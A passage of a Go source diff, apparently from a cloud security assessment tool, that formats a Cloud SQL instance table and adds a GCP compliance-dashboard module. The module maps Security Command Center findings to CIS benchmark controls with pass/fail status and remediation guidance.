table body rows +func (m *CloudSQLModule) instancesToTableBody(instances []CloudSQLService.SQLInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + // Format encryption type + encryptionDisplay := instance.EncryptionType + if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { + encryptionDisplay = "Google" + } + + // Format public/private IPs + publicIP := instance.PublicIP + if publicIP == "" { + publicIP = "-" + } + privateIP := instance.PrivateIP + if privateIP == "" { + privateIP = "-" + } + + // If instance has authorized networks, create one row per network + if len(instance.AuthorizedNetworks) > 0 { + for _, network := range instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + + networkName := network.Name + if networkName == "" { + networkName = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + networkName, + network.Value, + publicAccess, + }) + } + } else { + // Instance has no authorized networks - single row + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + publicIP, + privateIP, + shared.BoolToYesNo(instance.RequireSSL), + shared.BoolToYesNo(instance.BackupEnabled), + shared.BoolToYesNo(instance.PointInTimeRecovery), + encryptionDisplay, + shared.BoolToYesNo(instance.IAMAuthentication), + shared.BoolToYesNo(instance.PasswordPolicyEnabled), + instance.AvailabilityType, + "-", + "-", + "-", + }) + } + } + return body +} diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go new file mode 100644 index 00000000..e081ed08 --- /dev/null +++ b/gcp/commands/compliancedashboard.go @@ -0,0 +1,1986 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" + +var GCPComplianceDashboardCommand = &cobra.Command{ + Use: GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + Aliases: []string{"compliance", "cis", "benchmark"}, + Hidden: true, + Short: "Assess regulatory compliance against CIS GCP Benchmarks and security frameworks", + Long: `Assess regulatory compliance posture against industry standards and security frameworks. + +Features: +- CIS GCP Foundation Benchmark assessment +- PCI-DSS control mapping +- SOC 2 control coverage analysis +- HIPAA compliance checks +- ISO 27001 control mapping +- Security Command Center compliance findings integration +- Organization policy compliance analysis +- Remediation guidance for failed controls + +Supported Frameworks: +- CIS GCP Foundation Benchmark v1.3/v2.0 +- PCI-DSS v3.2.1/v4.0 +- SOC 2 Type II +- HIPAA Security Rule +- ISO 27001:2013 +- NIST CSF + +Requires appropriate IAM permissions: +- roles/securitycenter.findingsViewer +- roles/orgpolicy.policyViewer +- roles/resourcemanager.organizationViewer`, + Run: runGCPComplianceDashboardCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ComplianceControl struct { + ControlID string + Framework string + ControlName string + Description string + Severity string // CRITICAL, HIGH, MEDIUM, LOW + Status string // PASS, FAIL, MANUAL, NOT_APPLICABLE + ResourceCount int + PassCount int + FailCount int + ProjectID string + Details string + Remediation string + References []string +} + +type ComplianceFramework struct { + Name string + Version string + TotalControls int + PassedControls int + FailedControls int + ManualControls int + NAControls int + Score float64 +} + +type ComplianceFailure struct { + ControlID string + Framework string + ControlName string + Severity string + ResourceName string + ResourceType string + ProjectID string + Details string + Remediation string + RiskScore int +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type ComplianceDashboardModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Controls []ComplianceControl + Frameworks map[string]*ComplianceFramework + Failures []ComplianceFailure + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Cached data for compliance checks + orgPolicies map[string]bool + sccFindings map[string][]string // category -> resources + projectMetadata map[string]map[string]interface{} +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type ComplianceDashboardOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComplianceDashboardOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComplianceDashboardOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPComplianceDashboardCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &ComplianceDashboardModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Controls: []ComplianceControl{}, + Frameworks: make(map[string]*ComplianceFramework), + Failures: []ComplianceFailure{}, + LootMap: make(map[string]*internal.LootFile), + orgPolicies: make(map[string]bool), + sccFindings: make(map[string][]string), + projectMetadata: make(map[string]map[string]interface{}), + } + + // Initialize loot files + module.initializeLootFiles() + + // Initialize frameworks + module.initializeFrameworks() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Framework Initialization +// ------------------------------ +func (m *ComplianceDashboardModule) initializeFrameworks() { + m.Frameworks["CIS-GCP-1.3"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "1.3", + } + m.Frameworks["CIS-GCP-2.0"] = &ComplianceFramework{ + Name: "CIS GCP Foundation Benchmark", + Version: "2.0", + } + m.Frameworks["PCI-DSS-4.0"] = &ComplianceFramework{ + Name: "PCI-DSS", + Version: "4.0", + } + m.Frameworks["SOC2"] = &ComplianceFramework{ + Name: "SOC 2 Type II", + Version: "2017", + } + m.Frameworks["HIPAA"] = &ComplianceFramework{ + Name: "HIPAA Security Rule", + Version: "2013", + } + m.Frameworks["ISO27001"] = &ComplianceFramework{ + Name: "ISO 27001", + Version: "2013", + } + m.Frameworks["NIST-CSF"] = &ComplianceFramework{ + Name: "NIST Cybersecurity Framework", + Version: "1.1", + } +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ComplianceDashboardModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Assessing compliance posture against security frameworks...", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + // Step 1: Gather SCC findings for compliance mapping + m.gatherSCCFindings(ctx, logger) + + // Step 2: Gather organization policies + m.gatherOrgPolicies(ctx, logger) + + // Step 3: Run CIS GCP Benchmark checks + m.runCISBenchmarkChecks(ctx, logger) + + // Step 4: Map to other frameworks + m.mapToFrameworks() + + // Check results + totalControls := len(m.Controls) + if totalControls == 0 { + logger.InfoM("No compliance controls could be assessed", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + logger.InfoM("This could mean: (1) Insufficient permissions, (2) No resources to assess", GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + return + } + + // Count by status + passCount := 0 + failCount := 0 + manualCount := 0 + for _, c := range m.Controls { + switch c.Status { + case "PASS": + passCount++ + case "FAIL": + failCount++ + case "MANUAL": + manualCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Assessed %d compliance control(s): %d PASS, %d FAIL, %d MANUAL", + totalControls, passCount, failCount, manualCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + + if failCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] %d compliance control(s) failed", failCount), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Data Gathering +// ------------------------------ +func (m *ComplianceDashboardModule) gatherSCCFindings(ctx context.Context, logger internal.Logger) { + client, err := securitycenter.NewClient(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Security Command Center client") + return + } + defer client.Close() + + for _, projectID := range m.ProjectIDs { + parent := fmt.Sprintf("projects/%s/sources/-", projectID) + + req := &securitycenterpb.ListFindingsRequest{ + Parent: parent, + Filter: `state="ACTIVE"`, + } + + it := client.ListFindings(ctx, req) + for { + result, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + if result.Finding != nil { + category := result.Finding.Category + m.mu.Lock() + m.sccFindings[category] = append(m.sccFindings[category], result.Finding.ResourceName) + m.mu.Unlock() + } + } + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Gathered %d SCC finding categories", len(m.sccFindings)), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + } +} + +func (m *ComplianceDashboardModule) gatherOrgPolicies(ctx context.Context, logger internal.Logger) { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_COMPLIANCEDASHBOARD_MODULE_NAME, + "Could not create Resource Manager client") + return + } + + for _, projectID := range m.ProjectIDs { + project, err := crmService.Projects.Get(projectID).Do() + if err != nil { + continue + } + + m.mu.Lock() + m.projectMetadata[projectID] = map[string]interface{}{ + "name": project.Name, + "parent": project.Parent, + "labels": project.Labels, + } + m.mu.Unlock() + } +} + +// ------------------------------ +// CIS Benchmark Checks +// ------------------------------ +func (m *ComplianceDashboardModule) runCISBenchmarkChecks(ctx context.Context, logger internal.Logger) { + // CIS GCP Foundation Benchmark v1.3 / v2.0 Controls + + // Section 1: Identity and Access Management + m.checkCIS_1_1_ServiceAccountAdmin(ctx, logger) + m.checkCIS_1_2_ServiceAccountUser(ctx, logger) + m.checkCIS_1_3_ServiceAccountKeys(ctx, logger) + m.checkCIS_1_4_ServiceAccountTokenCreator(ctx, logger) + m.checkCIS_1_5_SeperationOfDuties(ctx, logger) + m.checkCIS_1_6_KMSRoles(ctx, logger) + m.checkCIS_1_7_SAKeyRotation(ctx, logger) + m.checkCIS_1_8_UserManagedKeys(ctx, logger) + m.checkCIS_1_9_CloudKMSSeparation(ctx, logger) + m.checkCIS_1_10_APIKeys(ctx, logger) + + // Section 2: Logging and Monitoring + m.checkCIS_2_1_CloudAuditLogging(ctx, logger) + m.checkCIS_2_2_LogSinks(ctx, logger) + m.checkCIS_2_3_RetentionPolicy(ctx, logger) + m.checkCIS_2_4_ProjectOwnership(ctx, logger) + m.checkCIS_2_5_AuditConfigChanges(ctx, logger) + m.checkCIS_2_6_SQLInstanceChanges(ctx, logger) + m.checkCIS_2_7_NetworkChanges(ctx, logger) + m.checkCIS_2_8_RouteChanges(ctx, logger) + m.checkCIS_2_9_FirewallChanges(ctx, logger) + m.checkCIS_2_10_VPCChanges(ctx, logger) + m.checkCIS_2_11_SQLServerAccessChanges(ctx, logger) + + // Section 3: Networking + m.checkCIS_3_1_DefaultNetwork(ctx, logger) + m.checkCIS_3_2_LegacyNetworks(ctx, logger) + m.checkCIS_3_3_DNSSEC(ctx, logger) + m.checkCIS_3_4_RSASHA1(ctx, logger) + m.checkCIS_3_5_RDPAccess(ctx, logger) + m.checkCIS_3_6_SSHAccess(ctx, logger) + m.checkCIS_3_7_FlowLogs(ctx, logger) + m.checkCIS_3_8_SSLPolicy(ctx, logger) + m.checkCIS_3_9_FirewallLogging(ctx, logger) + m.checkCIS_3_10_VPCNetworkPeering(ctx, logger) + + // Section 4: Virtual Machines + m.checkCIS_4_1_DefaultServiceAccount(ctx, logger) + m.checkCIS_4_2_BlockProjectWideSSH(ctx, logger) + m.checkCIS_4_3_OSLogin(ctx, logger) + m.checkCIS_4_4_SerialPortDisabled(ctx, logger) + m.checkCIS_4_5_IPForwarding(ctx, logger) + m.checkCIS_4_6_PublicIP(ctx, logger) + m.checkCIS_4_7_ShieldedVM(ctx, logger) + m.checkCIS_4_8_ComputeEncryption(ctx, logger) + m.checkCIS_4_9_ConfidentialComputing(ctx, logger) + + // Section 5: Storage + m.checkCIS_5_1_UniformBucketAccess(ctx, logger) + m.checkCIS_5_2_PublicBuckets(ctx, logger) + + // Section 6: Cloud SQL + m.checkCIS_6_1_SQLPublicIP(ctx, logger) + m.checkCIS_6_2_SQLAuthorizedNetworks(ctx, logger) + m.checkCIS_6_3_SQLSSLRequired(ctx, logger) + m.checkCIS_6_4_SQLNoPublicIP(ctx, logger) + m.checkCIS_6_5_SQLBackups(ctx, logger) + m.checkCIS_6_6_SQLContainedDB(ctx, logger) + m.checkCIS_6_7_SQLCrossDBAOwnership(ctx, logger) + + // Section 7: BigQuery + m.checkCIS_7_1_BigQueryCMEK(ctx, logger) + m.checkCIS_7_2_BigQueryTableCMEK(ctx, logger) + m.checkCIS_7_3_BigQueryDatasetPublic(ctx, logger) +} + +// CIS Control Check Implementations +func (m *ComplianceDashboardModule) checkCIS_1_1_ServiceAccountAdmin(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Admin is not assigned at project level", + Description: "The Service Account Admin role should not be assigned at the project level", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review IAM bindings and remove Service Account Admin role at project level", + References: []string{"https://cloud.google.com/iam/docs/understanding-roles"}, + } + + // Check SCC findings for this category + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_ADMIN_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account Admin role", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "iam-binding", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_2_ServiceAccountUser(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account User is not assigned at project level", + Description: "Service Account User role grants impersonation capabilities and should be restricted", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Remove Service Account User role at project level, assign at service account level instead", + References: []string{"https://cloud.google.com/iam/docs/service-accounts"}, + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_USER_OVER_GRANTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d resources with over-granted Service Account User role", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_3_ServiceAccountKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are not created", + Description: "User-managed keys are a security risk and should be avoided", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use workload identity or short-lived tokens instead of user-managed keys", + References: []string{"https://cloud.google.com/iam/docs/best-practices-for-securing-service-accounts"}, + } + + if findings, ok := m.sccFindings["USER_MANAGED_SERVICE_ACCOUNT_KEY"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d user-managed service account keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "service-account-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_4_ServiceAccountTokenCreator(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Service Account Token Creator is properly scoped", + Description: "Token Creator role allows identity impersonation and should be carefully controlled", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Review and restrict Service Account Token Creator role assignments", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_5_SeperationOfDuties(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure separation of duties is enforced", + Description: "Users should not have both Service Account Admin and Service Account User roles", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement separation of duties by assigning roles to different principals", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_6_KMSRoles(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure KMS encryption and decryption roles are separated", + Description: "KMS admin should not have encryption/decryption access", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Separate KMS administration from encryption/decryption operations", + } + + if findings, ok := m.sccFindings["KMS_ROLE_SEPARATION"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_7_SAKeyRotation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure service account keys are rotated within 90 days", + Description: "Service account keys should be rotated regularly", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Implement key rotation policy or use short-lived credentials", + } + + if findings, ok := m.sccFindings["SERVICE_ACCOUNT_KEY_NOT_ROTATED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d service account keys older than 90 days", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_8_UserManagedKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure user-managed service account keys are reviewed", + Description: "All user-managed keys should be inventoried and reviewed", + Severity: "LOW", + Status: "MANUAL", + Remediation: "Document and regularly review all user-managed service account keys", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_9_CloudKMSSeparation(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud KMS cryptokeys are not anonymously or publicly accessible", + Description: "KMS keys should not be accessible to allUsers or allAuthenticatedUsers", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Remove public access from Cloud KMS keys", + } + + if findings, ok := m.sccFindings["KMS_KEY_PUBLIC"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d publicly accessible KMS keys", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "kms-key", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_1_10_APIKeys(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-1.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure API keys are restricted to only APIs and hosts that need them", + Description: "API keys should have appropriate restrictions", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Apply API and host restrictions to all API keys", + } + + if findings, ok := m.sccFindings["API_KEY_NOT_RESTRICTED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d unrestricted API keys", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 2: Logging and Monitoring Controls +func (m *ComplianceDashboardModule) checkCIS_2_1_CloudAuditLogging(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure Cloud Audit Logging is configured properly", + Description: "Cloud Audit Logs should be enabled for all services", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Enable Data Access audit logs for all services", + } + + if findings, ok := m.sccFindings["AUDIT_LOGGING_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d services with disabled audit logging", len(findings)) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_2_LogSinks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts exist for audit configuration changes", + Description: "Alerts should be configured for audit configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics and alerts for audit config changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_3_RetentionPolicy(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log bucket has retention policy with appropriate duration", + Description: "Log buckets should have retention policies configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Configure retention policies on all log storage buckets", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_4_ProjectOwnership(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for project ownership changes", + Description: "Alerts for project ownership changes should be configured", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for project ownership assignment changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_5_AuditConfigChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for audit configuration changes", + Description: "Monitor changes to audit configurations", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create log-based metrics for audit configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_6_SQLInstanceChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for SQL instance configuration changes", + Description: "Monitor Cloud SQL instance configuration changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL configuration changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_7_NetworkChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.7", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network changes", + Description: "Monitor VPC network creation, deletion, and modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC network changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_8_RouteChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.8", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC route changes", + Description: "Monitor VPC route modifications", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC route changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_9_FirewallChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.9", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for firewall rule changes", + Description: "Monitor firewall rule creation, modification, and deletion", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for firewall rule changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_10_VPCChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.10", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for VPC network firewall changes", + Description: "Monitor VPC firewall changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for VPC firewall changes", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_2_11_SQLServerAccessChanges(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-2.11", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure log metric filter and alerts for Cloud SQL Server access changes", + Description: "Monitor Cloud SQL authorization changes", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Create alerts for Cloud SQL authorization modifications", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +// Section 3: Networking Controls +func (m *ComplianceDashboardModule) checkCIS_3_1_DefaultNetwork(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.1", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure default network does not exist", + Description: "The default network should be deleted as it has overly permissive firewall rules", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Delete the default network and create custom VPC networks", + } + + if findings, ok := m.sccFindings["DEFAULT_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d projects with default network", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "vpc-network", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_2_LegacyNetworks(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.2", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure legacy networks do not exist", + Description: "Legacy networks lack granular subnet control and should not be used", + Severity: "HIGH", + Status: "MANUAL", + Remediation: "Migrate from legacy networks to VPC networks", + } + + if findings, ok := m.sccFindings["LEGACY_NETWORK"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_3_DNSSEC(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.3", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure DNSSEC is enabled for Cloud DNS", + Description: "DNSSEC protects against DNS spoofing attacks", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Enable DNSSEC for all Cloud DNS managed zones", + } + + if findings, ok := m.sccFindings["DNSSEC_DISABLED"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_4_RSASHA1(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.4", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RSASHA1 is not used for zone-signing and key-signing", + Description: "RSASHA1 is considered weak for DNSSEC", + Severity: "MEDIUM", + Status: "MANUAL", + Remediation: "Use RSASHA256 or ECDSAP256SHA256 for DNSSEC", + } + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_5_RDPAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.5", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure RDP access is restricted from the Internet", + Description: "RDP (port 3389) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict RDP access to specific IP ranges", + } + + if findings, ok := m.sccFindings["OPEN_RDP_PORT"]; ok && len(findings) > 0 { + control.Status = "FAIL" + control.FailCount = len(findings) + control.Details = fmt.Sprintf("Found %d firewall rules allowing RDP from internet", len(findings)) + + for _, resource := range findings { + m.addFailure(control, resource, "firewall-rule", m.getProjectFromResource(resource)) + } + } else { + control.Status = "PASS" + } + + m.mu.Lock() + m.Controls = append(m.Controls, control) + m.mu.Unlock() +} + +func (m *ComplianceDashboardModule) checkCIS_3_6_SSHAccess(ctx context.Context, logger internal.Logger) { + control := ComplianceControl{ + ControlID: "CIS-3.6", + Framework: "CIS-GCP-2.0", + ControlName: "Ensure SSH access is restricted from the Internet", + Description: "SSH (port 22) should not be open to 0.0.0.0/0", + Severity: "CRITICAL", + Status: "MANUAL", + Remediation: "Restrict SSH access to specific IP ranges or use IAP", + } + + if findings, ok := m.sccFindings["OPEN_SSH_PORT"]; ok && len(findings) > 